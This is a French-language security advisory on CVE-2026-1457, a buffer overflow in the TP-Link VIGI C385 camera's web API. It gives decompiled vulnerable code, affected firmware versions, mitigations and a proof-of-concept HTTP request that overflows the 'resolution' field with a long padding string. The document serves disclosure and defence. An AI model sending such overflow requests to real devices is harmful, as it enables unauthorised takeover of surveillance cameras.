
Fournit une analyse détaillée et une preuve de concept pour CVE-2026-1457, un débordement de tampon authentifié dans l'API web TP-Link VIGI C385 menant à l'exécution de code à distance.
CVE-2026-1457 est une vulnérabilité de dépassement de tampon authentifiée dans l'API web du TP-Link VIGI C385 V1. Cette vulnérabilité permet à des attaquants authentifiés d'exécuter du code à distance (RCE).
Score CVSS v4.0 : 8,5 (Élevé)
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
| Modèle de produit | Version affectée |
|---|
| VIGI C385 V1 | < 3.1.1 Build 251124 Rel.50371n |
La fonction set_resolution_18AAD8 utilise strcpy pour copier l'entrée utilisateur dans un tampon sans validation de longueur, ce qui entraîne un dépassement de tampon.
int __fastcall set_resolution_18AAD8(int a1, char a2)
{
const char *string_origin; // r5
const char *v4; // r4
int result; // r0
char v6[72]; // [sp+0h] [bp-A0h] BYREF
char v7[88]; // [sp+48h] [bp-58h] BYREF
memset(v6, 0, sizeof(v6));
memset(v7, 0, 72);
string_origin = jso_obj_get_string_origin(a2, (char)"secname");
v4 = jso_obj_get_string_origin(a2, (char)"resolution");
sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
sub_1FE6BC((int)"/video/minor", (int)v7, 0x44u);
if ( !strcmp(string_origin, "main") )
{
result = strcmp(v4, &v6[29]);
if ( result ) // true if v4 is greater than &v6[29]
{
sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
strcpy(&v6[29], v4); // ⚠️ buffer overflow
sub_1FE804("/video/main", v6, 72);
return 0;
}
}
else if ( !strcmp(string_origin, "minor") )
{
result = strcmp(v4, &v7[29]);
if ( result )
{
sub_1FE6BC((int)"/video/minor", (int)v7, 0x48u);
strcpy(&v7[29], v4); // ⚠️ buffer overflow
sub_1FE804("/video/minor", v7, 72);
return 0;
}
}
else
{
msg_debug(3, "http_do_setResolution", 3137, "[HTTPD]set resolution param error.\n");
return -40209;
}
return result;
}
v6 est déclaré sur 72 octets, mais strcpy est effectué à la position &v6[29].v7 est déclaré sur 88 octets, mais strcpy est effectué à la position &v7[29].v4) n'est pas validée en termes de longueur avant l'utilisation de strcpy, ce qui provoque un dépassement de tampon.v6) et 59 octets (v7) respectivement, mais des chaînes plus longues peuvent être copiées.stok valide requis)Un attaquant peut exploiter la fonctionnalité set_resolution du point de terminaison /ds pour envoyer des charges utiles malveillantes.
POST /stok=9p73~f9L0fGs33wt3D3XDc)7u)!wt83f/ds HTTP/1.1
Host: 192.168.0.100
Content-Length: 3015
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Origin: https://192.168.0.100
Connection: close
{
"video": {
"set_resolution": {
"secname": "main",
"resolution": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
},
"method": "do"
}
Ce document ne contient pas de code d'exploitation exécutable. La capture d'écran suivante démontre une exploitation réussie aboutissant à une connexion shell inversée :

Mise à jour du firmware : Mettez à jour les appareils concernés vers la version 3.1.1 Build 251124 Rel.50371n ou ultérieure.
Isolation du réseau : Si possible, placez les appareils VIGI C385 dans un segment réseau isolé.
Contrôle d'accès : Restreignez l'accès à l'interface de gestion aux seuls réseaux de confiance.
Surveillance : Surveillez les comportements réseau ou les activités anormales des appareils.
Cette vulnérabilité a été découverte et analysée par :
de NSHC RedAlert Labs